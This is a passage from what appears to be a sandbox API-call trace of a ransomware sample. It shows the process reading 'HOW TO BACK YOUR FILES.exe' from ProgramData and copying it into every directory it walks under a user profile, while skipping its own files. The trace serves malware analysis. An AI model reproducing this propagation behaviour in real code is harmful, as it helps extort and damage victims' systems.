YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.646] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.647] GetLastError () returned 0x0 [0078.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.647] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.647] CloseHandle (hObject=0xa4) returned 1 [0078.647] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.647] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.647] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.647] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.647] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.647] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.647] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.647] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.648] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.648] GetLastError () returned 0x0 [0078.648] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.648] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.648] CloseHandle (hObject=0xa4) returned 1 [0078.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.648] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.649] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.649] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.649] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.649] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.649] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.649] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.649] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.650] GetLastError () returned 0x0 [0078.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.650] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.650] CloseHandle (hObject=0xa4) returned 1 [0078.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.650] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.650] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.650] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.651] GetLastError () returned 0x0 [0078.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.651] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.651] CloseHandle (hObject=0xa4) returned 1 [0078.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.652] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.652] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.652] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.652] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.652] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.652] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.653] GetLastError () returned 0x0 [0078.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.653] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.653] CloseHandle (hObject=0xa4) returned 1 [0078.653] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.653] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.653] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft" [0078.653] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft" [0078.654] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.654] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.654] GetLastError () returned 0x0 [0078.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.654] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.654] CloseHandle (hObject=0xa4) returned 1 [0078.655] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.655] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.655] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0078.655] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar" [0078.655] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.655] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.656] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.656] GetLastError () returned 0x0 [0078.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.656] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.656] CloseHandle (hObject=0xa4) returned 1 [0078.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.656] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.656] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.656] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.656] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.657] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.657] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.657] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.657] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.657] GetLastError () returned 0x0 [0078.657] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.657] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.657] CloseHandle (hObject=0xa4) returned 1 [0078.658] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.658] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.658] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.658] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0078.658] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media" [0078.658] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.658] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.659] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.659] GetLastError () returned 0x0 [0078.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.659] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.659] CloseHandle (hObject=0xa4) returned 1 [0078.659] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.659] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.659] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.659] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.660] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.660] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and 